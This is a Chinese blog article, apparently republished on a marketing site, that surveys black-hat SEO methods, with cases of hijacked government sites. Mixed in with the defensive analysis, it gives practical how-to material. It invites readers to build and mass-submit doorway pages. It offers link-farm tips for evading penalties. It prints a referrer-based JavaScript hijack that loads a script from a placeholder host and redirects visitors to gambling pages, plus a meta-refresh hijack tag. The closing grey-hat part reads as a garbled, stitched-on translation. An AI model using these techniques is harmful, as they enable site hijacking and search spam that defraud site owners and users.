张岩seo:黑帽SEO优化技术手法
网络推广 2022-01-14 10:46www.dzhlxh.cn网络推广竞价
SEO全称为搜索引擎优化,是指通过站内优化、站外优化等方式,提升搜索引擎收录排名。既然有SEO技术,便会有相应的从业人员,他们被称为白帽SEO,专指通过公正SEO手法,帮助提升站点排名的专业人员。
当然有白便会有黑,由于白帽SEO优化的过程将会十分漫长,一个新站想要获取好的排名,往往需要花上几年时间做优化推广。因此一些想要快速提升自身网站排名的小伙伴,便开始在SEO上研究作弊手法,从而诞生了黑帽SEO。黑帽SEO是指通过作弊手段,让站点快速提升排名的一类SEO技术,或者说是黑客技术,比如说:黑链(暗链)、站群、网站劫持、桥页等,黑帽SEO能够快速提升排名,但毕竟是违规作弊行为,容易被K。
此系统文章总共分为四篇,分别是手法篇、工具篇、隐藏篇、总结篇;本篇为黑帽SEO之手法篇,主要介绍黑帽seo的概念以及一些常用的手法。
插曲:有趣的是,就在前几天有位朋友询问了我关于黑帽SEO方面的问题,原因是他一位朋友运营的一个网站,页面莫名其妙出现了赌博博彩的内容,删除后又会自动生成,其十分苦难便寻求他帮忙。
SEO的一些黑色手法
黑帽SEO的手法很多,并且在不断地更新换代,其中最常见的包括利用泛解析做站群,入侵高权重网站挂暗链,入侵高权重网站做网页劫持,篡改高权重网站网页内容,利用高权重网站二级目录做推广页面,修改nginx配置做目录反向代理等等。接下来我结合实际案例,介绍一些常用的手段。
斗篷法(Cloaking)
为什么叫斗篷法呢?可能是因为只能看到斗篷,而不能看到真面目的意思吧!斗篷法指站长将一个网页用两个不同版本的页面,一个版本给搜索引擎看,一个版本给用户浏览。而搜索引擎只能看到斗篷。
如果用户访问,那返回的可能是一个高大上的页面,如果是搜索引擎访问,返回的可能是一个适合优化的页面。斗篷法基本用在灰色行业或是黑色行业中。桥页也叫:门页、跳页、过渡页,通常是用软件自动生成大量包含关键词的网页,然后从这些网页做自动转向到主页。
目的是希望这些以不同关键词为目标的桥页在搜索引擎中得到好的排名。当用户点击搜索结果的时候,会自动转到主页。有的时候是在桥页上放上一个通往主页的链接,而不自动转向。大部分情况下,这些桥页都是由软件生成的。你可以想象,生成的文字是杂乱无章,没有什么逻辑的。如果是由人写出来的真正包含关键词的文章,就不是桥页了。所谓的桥页也叫过渡页,是指一个页面打开之后会自动(或手动)转向到别的页面。(注意:这种方法在baidu里面可以使用,但不要用在google里!),我们来看一个html格式的桥页的全部代码:
这个页面打开后会在0秒(由content="0定义时间)内转向到目标网页(由meta标签中的url=">定义转向的站点),所以大家只要稍加修改,就可以变成你自己的桥页了。我们为我们的所有商品都建立一个这样的页面,每一个页面里都依次按照我们的商品设置不同的关键字,然后依次把这些页面上传到你的目录,比如为上传后的地址为:......那么我们再依次把这些地址一一的提交给搜索引擎,这样,当搜索引擎搜索到这些桥页并被用户打开后,会马上转入到你指定的主页。这样的话你的这些产品被搜索到的机会是不是就大大提高了?
对于桥页的建立,关键是还是关键字要选择好,就拿上面那个手机网站的例子来说,我们要依次为每一个关键字都要做一个单独的桥页,关键字要尽量的全。再有,一个关键字我们也完全可以做多个内容完全相同但名字一定要不相同的桥页,并一一的提交给搜索引擎来增加被搜索到的机率。它针对搜索引擎而作,通过根据特定的搜索词制作一些页面获得较好的排名,引导用户进入主站。有的时候是根据搜索引擎算法制作页面,迎合搜索引擎算法获得好的排名。但不管是那一种,它实际上都属于一种seo作弊行为。
桥页跳转方式
1、自动跳转,就像上面讲的,利用自动跳转代码,直接跳转到目标页,优点:用户不知道跳转到了其他页,比较信任。缺点:容易被搜索引擎发现。
2、手动跳转,在桥页上制作蓝色显眼链接,引导用户。优点:不容易被搜索引擎发现,缺点:用户信任度降低。
利用泛解析建立泛二级域名站群
利用DNS泛解析可以快速建立站群,因为一个一级域名便可以衍生出无数个二级域名,当然一般需要借助站群工具,因为建立站群需要有很多内容不同的页面,手工建立显然不可能。而seo人员大费周章地建立站群的目的,便是能够快速吸引大量的搜索引擎爬虫,增加网站在搜索引擎中的收录量。以下是某个泛二级域名站群案例截图:
需要说明的是,以上截图中的二级域名并不是通过一条条dns解析记录去绑定的,解析里面设置的是*,也就是泛解析。而服务器端有程序或者代码去控制当构造不同的二级域名访问时,会返回不同的网页内容,也就让搜索引擎误认为每个二级域名都是一个单独的网站。
泛解析有很多优点,比如对用户友好(即使输错二级域名也能跳转到目标网站),又能够更快速地被搜索引擎收录等。基于这些优点,很多站长会选择用此方式来增加网站收录,然而如果没有妥善的使用泛解析可能会带来难以想象的危害。
利用泛解析做黑产
利用泛解析做黑帽seo的方式也有很多种,基于是否需要入侵网站以及dns服务器,我分为入侵法与非入侵法来介绍。
入侵法
真实案例:几个月前我们发现一个重要政府网站出现了大量博彩页面,取证截图如下:
经过分析我发现,此手法利用的便是泛解析,从截图中可以看到出现了大量此政府网站的二级甚至三级域名,而这些域名都是随机构造的,访问后会跳转到博彩色情等非法页面,而访问一级域名又是正常的内容。且先不分析跳转的过程中用到了哪些技术,单从泛解析记录就不难看出,此网站被人篡改了dns解析记录。我们有理由相信,黑客获取了此域名的dns解析控制权限,并将此域名泛解析到黑客准备好的服务器上。那么黑客这么做的目的很明显,为了让搜索引擎快速收录二级或者三级域名,从而达到引流到非法页面的目的。
我们通过分析此政府网站被入侵特征推导出此事件过程应该是,黑客通过入侵手段获取到了该政府网站dns解析权限(如何获取暂不可知),然后通过添加泛解析记录,将此记录指向黑客准备好的服务器,而此服务器上有动态语言去实现通过不同二级域名访问,返回不同的页面结果功能。由于政府网站本身权重很高,因此二级域名页面被百度快速收录,达到为非法页面引流的目的。这种手法的好处在于不必入侵网站,而只要获取到域名解析权限即可(当然获取域名解析权限也并非易事)。
非入侵法
真实案例:几天前我们发现有一个网站(http://sdddzg.cn)利用泛解析做恶意推广,查看网站特征后,我们尝试构造不同的二级域名访问,取证截图如下。构造二级域名访问:
最终返回结果:
可以看到返回结果对网页内容以及url做了处理,当我们尝试构造不同的二级域名访问,发现返回结果内容都不一样,然而通过获取ip发现来自同一台服务器。首先我们不难想到,此域名一定是做了泛解析的,那么它是如何控制网页内容变化的呢?查看网页源码可以看到http://jiang.gov.cn网页源码被嵌入到了目标网页中。
那么其实想要实现此技术也并不难,可以在服务端上用代码实现。首先通过获取请求的二级域名地址,然后去访问该二级域名内容获取源码镶嵌到自己的网页内。如果构造的二级域名内容不是一个完整的域名地址(如:http://1.sdddzg.cn),则随机返回一段源码。这种手法的好处在于不必入侵网站,只需要自己搭建一台服务器即可,但推广效果没有那么好。
利用网站暗链
在网页中植入暗链这种手法已经相对落伍了,目前用的也比较少,因为搜索引擎已经能够对此作弊手法进行检测。为了介绍知识的完整性,此处我简单介绍一下。暗链也称为黑链,即隐蔽链接 hidden links,是黑帽SEO的作弊手法之一。挂暗链的目的很简单,增加网站外链,提高网站排名;实现方式主要分为几种:利用CSS实现、利用JS实现、利用DIV+JS实现等。具体介绍请参考:黑帽SEO之暗链
利用高权重网站,构造关键词URL做推广
真实案例:一年前当我刚研究黑帽SEO的时候发现了一个有趣的黑帽SEO方式,虽然手法比较拙劣老套,但却也有成效。于是在写这篇文章的时候,我特意找了一个典型案例,与大家分享,取证截图如下。
将URL中的参数内容显示到网页内,这原本是某些网页的一种特殊功能。以往的经验告诉我这种特性如果没有处理好,可能会引发XSS漏洞,而今我不得不认识到,这种特性也一直被用于黑帽seo。通过在url或者post数据包(常见于搜索框功能)中构造推广关键词,再将有推广关键词页面添加到蜘蛛池中,使搜索引擎收录就能达到推广的目的。一般此种手法常被用来推广qq号,盈利网站等(类似打广告),而当我们通过搜索引擎搜索某些关键词时(如色情资源),就会显示出此页面,从而达到推广自身账号或者网站的目的,当然这只是一种推广手段,并不太涉及引流。
利用网页劫持引流
网页劫持,又叫网站劫持或者搜索引擎劫持,是目前黑帽SEO中最流行的一种做法。其原因可以简单概括为:易收录、难发现,易收录表现为搜索引擎尚没有很好的机制能够检测出此作弊手段,网页劫持手法仍然能够大量引流。难发现是指网页劫持手法比较隐蔽,一般非技术人员很难发现它的存在。
网页劫持从手法上可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;
网页劫持的表现形式可以是劫持跳转,也可以是劫持呈现的网页内容(与直接篡改网页内容不同),目前被广泛应用于私服、博彩等暴利行业。
网页劫持真实案例
几个月前我处理了一起网页劫持案列,起因是某政府网站上出现了博彩相关内容(排除新闻页面),这显然是不合规的。排除管理员失误添加导致,恐怕此网站多半是被黑客入侵了。首先我访问了该记录上的链接,紧接着浏览器中出现了一个正常的政府页面,而也就须臾之间,网页瞬间又跳转到了博彩网页。图一为正常政府页面:
图二为博彩页面:
可以看到博彩页面的域名为http://www.0980828.com,显然不是先前的政府网站域名http://xxxx.gov.cn。看到此现象,再结合多年安全经验,我大致能够猜测此网站应该是被网页劫持了。通过分析以上过程的数据包,不难发现在该网站前端页面被嵌入了一段非法代码。
此代码存放在43.250.75.61服务器上,查看该服务器信息,发现其在日本。
而通过访问此段代码,返回内容则是跳转到http://www.0980828.com网站上。
分析至此,我们不难发现,导致页面跳转的原因便是http://xxxx.gov.cn网页被非法嵌入了一窜代码,而此代码能够控制访问该网页时跳转到博彩页面。这是搜索引擎劫持最为基础且常见的一种方式,其变种甚多,类型方式也各异。最后我通过登录web服务器查看,发现了存在大量html文件被篡改,且都在文件开头被写入外部js引用。那么此入侵事件过程应该是,黑客通过web应用程序某些漏洞入侵服务器(实际是管理后台弱口令+任意文件上传),通过批量篡改服务器静态文件实现网页劫持的目的。网页劫持的手法非常多,并不是这一个案例就能概括的,更多详细情况请继续看下文介绍。
服务端劫持
服务端劫持也称为全局劫持,此手法为修改网站动态语言文件,判断访问来源控制返回内容,从而达到网页劫持的目的。其特点往往是通过修改asp/aspx/php等后缀名文件,达到动态呈现网页内容的效果。
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本,然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问则返回正常页面。
客户端劫持
客户端劫持的手法也很多,但最常用的就两种:js劫持与Header劫持。js劫持目的是通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。js植入手法是可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。js劫持代码案例:以下代码可以使通过搜索引擎搜索的并点击页面时,执行一段js并跳转到博彩页面;而直接输入网址访问网页时,跳转到一个404页面。
today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');
}
else
{
window.location.href="../../404.htm";
}
代码分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。header劫持,就是在html代码的head中添加特殊标签,代码如下:
<meta http-equiv="refresh" content="10; url=http://thief.one">
header劫持利用的就是Meta Refresh Tag(自动转向)功能将流量引走。
直接篡改网页内容(比较低级)
有些黑客在入侵网站后,喜欢直接篡改网页内容,比如放上自己的qq号,或者作为推广将网页篡改成非法页面。在此我对此做法的黑客表示鄙视,因为这是一种最恶劣最低级的手法。恶劣在于直接篡改网页内容,可能会导致网站无法挽回的损失;低级在于此手法极易被发现,起不到真正的引流推广作用。
链接农场
链接养殖场通常来者不拒,而且这些被搜集的网站通常是互不相关的。链接农场是一种被搜索引擎禁止的作弊方式,在正规的SEO中不论制作或者介入链接工厂,都会受到惩罚。
举例说明:某站长建立几十个甚至上百个简单的网站(很垃圾的网站),只做几个关键词(如:seo论坛,seo优化,seo基础),网站没有任何的可用信息和有效信息,只是通过互相建立友情链接,就能马上可以短期内排到百度搜索的首页,提高网站的权重,从而霸占市场,短期内获得高额利润。这个技术叫做linkfarm,属于黑帽技术,这些快速上升的网站也属于链接养殖场,短期内欺骗百度蜘蛛,当百度蜘蛛知悉后,站点基本也就被k了!
特点
1.链接农场中存在成百上千的Incoming/Inbound Links(导入链接),而且在死亡之前会不断增加。
2.链接农场是双向链接。外部链接链接到农场网站,农场网站链接到外部网站。
3.被链接农场链接的网站杂乱无章,没有类目和权重的要求
4.被链接农场链接的网站在Google搜索时,会在类似结果中出现乱七八糟的不相关网址。
5.链接农场有自助或手动的添加链接方式。
危害
(1)链接农场中的链接在权重计算中不予考虑。
(2)链接农场链接页面中的权重被降低。
(3)链接农场中链接页面本身的重要性被降低。
(4)链接农场中的页面导出链接重要性被降低。
(5)链接农场中链接页面关键词对用户来说毫无意义,被搜索引擎认为作弊。链接养殖场(Link Farm)与网址导航区别编辑网址导航一般不会要求与你交换链接,即不会要求你网站有他们的链接;而链接养殖场是双向链接,因此如果链接养殖场网站或网页单方面指向你的站点,则对你并没有任何影响。
运用
1、现在的站群,包括黑豹站群或是市面上主流的站群,都在利用链接农场。2、自己养一批站,然后导入链接注意一些基本OK
3、大多数的链接工厂,一般都是同类型网站、同IP网站相互之间的链接,或是IP的C段相同,这样很容易被K,思路来了,比如做100个站,可以同时租几个机器,IP段不同,然后10个站一个IP,这样,相互再换链接,被K的机率就小很多。
4、同类型、不同IP之间,应该没事,比如都是地方新闻网。
利用高权重网站二级目录
即黑客入侵网站后,在网站二级目录下创建很多自己做推广的页面。为了达到引流的目的黑客往往需要建立大量的二级目录页面,因此需要用到寄生虫程序来自动化的创建页面。此手法也需要入侵高权重网站,获取网站服务器权限。与网页劫持手法不同的是,此手法侧重点在于利用高权重网站自身的优势,在其目录下创建多个推广页面;而网页劫持侧重隐藏自身,其可以做到动态呈现网页内容给客户。因此在实际使用中,黑客经常结合两者使用。此手法与利用泛解析做黑帽seo的手法还是有明显差异的,虽然同样是利用高权重网站本身的优势,但泛解析利用的是二级域名,而此手法利用的是二级目录,当然两者有异曲同工之妙。
利用高权重网站二级目录手法的案例与泛解析案例类似,这里不再详述。既然我前面提到此手法往往需要寄生虫程序的配合使用,那么何为寄生虫程序?它又有何玄机?下篇将会详细介绍,敬请期待。
虽然黑帽SEO并不违法,但它确实违反了搜索引擎设定的网站管理员指南。换句话说,它仍然违反规则。这意味着如果你参与黑帽SEO,你必须愿意受到一个讨厌的惩罚作为惩罚。从搜索引擎获得惩罚将导致您的网站在搜索结果中下降或更糟糕,它可能会被完全删除。这意味着您的网站将获得更少的流量,并最终减少客户。
灰色的帽子SEO模糊线
你不会找到灰色帽子SEO,但你会发现它在黑色和白色帽子SEO的中间。如果有SEO策略,你很难将其归类为黑帽或白帽SEO,那么它可能是一种灰帽子技术。
什么是灰帽SEO?
灰色帽子搜索引擎优化包含略带阴影的SEO策略。虽然他们并不反对搜索引擎禁止的做法,但他们有点不道德。
灰色的帽子SEO线程接近黑帽SEO的线。灰帽SEO技术通常不会被列为网站站长指南中的禁止做法,但它们有点可疑。随着时间的推移,许多灰帽SEO的做法已经成为黑帽SEO的做法
其实当在写这篇文章前,我思索着尽量能够全面地介绍黑帽SEO知识以及手法。当开始写这篇文章的时候,我便有点无从下手,因为涉及知识面太广,手法又非常丰富,而当我写完这篇文章的时候,我觉得这一切才刚刚开始。
上一篇:黑帽seo技术
下一篇:叶胜超seo基础教程